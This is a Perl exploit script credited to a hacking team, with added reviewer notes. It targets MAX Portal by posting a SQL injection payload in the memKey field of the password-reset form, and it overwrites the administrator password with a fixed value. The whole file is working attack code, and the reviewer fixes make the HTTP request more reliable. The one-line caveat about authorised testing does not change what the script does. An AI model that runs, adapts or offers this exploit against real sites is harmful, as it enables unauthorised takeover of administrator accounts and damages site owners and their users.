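#!/usr/bin/perl
#################################################################
#  T r a p - S e t   U n d e r g r o u n d   H a c k i n g   T e a m
#################################################################
# EXPLOIT FOR - MAX Portal (All Versions)
#
# Exploit By : A l p h a _ P r o g r a m m e r ( Sirus-v )
# E-Mail     : Alpha_Programmer@Yahoo.com
#
# This exploit changes the admin's password in this portal: it POSTs
# a password-reset form to /password.asp?mode=reset with a SQL
# injection payload in the memKey parameter.
#
# Discovered by: s d
#
#################################################################
# Gr33tz To ==> mh_p0rtal , Oil_karchack , Str0ke & AlphaST.Com
# And Iranian Hacking & Security Teams :
#   IHS , Shabgard , Emperor , Crouz & Simorgh-ev
#################################################################
#
# Reviewer notes:
#   - Only run this against systems you are explicitly authorised to
#     test; it overwrites the administrator credential.
#   - Fixes relative to the original listing: the request line had no
#     line terminator (it ran straight into the Accept: header), the
#     headers used bare LF instead of CRLF, and Content-Length was
#     hard-coded to 111, which only matches the version-2 payload.
#     The length is now computed from the body that is actually sent.
#   - The script cannot confirm that the reset succeeded; it only
#     reports the server's HTTP status line.  Verify by logging in.

use strict;
use warnings;
use IO::Socket;

# Print the banner / usage text and exit.  Called when the mandatory
# <host> and <version> arguments are missing.
sub usage {
    print "\n==========================================\n";
    print " \n -- Exploit By Alpha Programmer --\n\n";
    print " Trap-Set Underground Hacking Team \n\n";
    print " Usage: Max.pl <host> <version> [port]\n\n";
    print " V3rsion :\n";
    print " 1 ==> Version 1.35 and 0lder\n";
    print " 2 ==> Version 1.36, 2.0 and Next\n";
    print "==========================================\n\n";
    print "Example:\n\n";
    print " Max.pl www.Site.com 1\n";
    exit();
}

usage() if @ARGV < 2;

my ($host, $version, $port) = @ARGV;

# Optional third argument: TCP port, default 80 (the original was fixed
# to port 80).  Reject anything that is not a valid port number.
$port = 80 unless defined $port;
die "Invalid port '$port'\n"
    unless $port =~ /\A\d+\z/ && $port > 0 && $port < 65536;

# SQL injection payloads for the memKey parameter, keyed by the
# <version> argument.  Both strings are kept byte-identical to the
# original exploit.  Version 1 is sent raw (spaces and quote are not
# URL-encoded, as in the original); version 2 is URL-encoded and its
# leading "%27%29" closes a quote and a parenthesis, so the query in
# newer releases presumably wraps memKey in parentheses.
my %payload_for = (
    1 => "foo' or M_Name='admin",
    2 => "foo%27%29+or+M_Name%3D%27admin%27+or+%28%271%27%3D%272",
);
die "Unknown version '$version' (use 1 or 2)\n"
    unless exists $payload_for{$version};
my $hell = $payload_for{$version};

# Form body.  "trapset" is the password the exploit sets for admin;
# memId=-1 and the injected memKey are what the original sends.
my $body = "pass=trapset&pass2=trapset&memId=-1&memKey=$hell&Submit=Submit";

# Host: header carries the port only when it is not the default.
my $host_header = $port == 80 ? $host : "$host:$port";

# Request headers, one per element; joined with CRLF below.  The
# Cookie header is reproduced verbatim from the original exploit.
# Proxy-Connection is a non-standard header that origin servers
# normally ignore; if the server does keep the connection open, the
# read below is bounded by an alarm instead of hanging.
my @headers = (
    "POST /password.asp?mode=reset HTTP/1.0",
    "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
    "Accept-Language: fa",
    "Content-Type: application/x-www-form-urlencoded",
    "Pragma: no-cache",
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)",
    "Host: $host_header",
    "Content-Length: " . length($body),
    "Proxy-Connection: Keep-Alive",
    "Cookie: SSOComhide=Name=admin; SSOComUser=Cookies=&Pword=d7fae5da3d785535c12b70865519ba86&Name=admin",
);
my $request = join("\r\n", @headers) . "\r\n\r\n" . $body;

my $remote = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => $host,
    PeerPort => $port,
    Timeout  => 10,          # connect timeout only
);
die "C4nn0t C0nn3ct to $host:$port: $@\n" unless $remote;
print "C0nn3cted\n";

print "\n";
print "[+] Attacking ...\n";
print "[+] Changing Admin's Password ...\n";
print {$remote} $request;

# Read the status line and drain the rest of the response.  The alarm
# guards against a server that honours keep-alive and never closes.
my $status = eval {
    local $SIG{ALRM} = sub { die "timeout\n" };
    alarm 15;
    my $line = <$remote>;
    while (<$remote>) { }
    alarm 0;
    $line;
};
if (defined $status) {
    print "[+] Server replied: $status";
}
else {
    print "[!] No status line read from server", ($@ ? " ($@)" : "\n");
}
close $remote;

print "[!] The reset is not verified by this script; confirm it by logging in.\n";
print "\nNow Go to $host and Login With :\n\n";
print "User: admin\n";
print "Pass: trapset\n\n";
print "Enjoy ;)\n";
print "\n";
### EOF ###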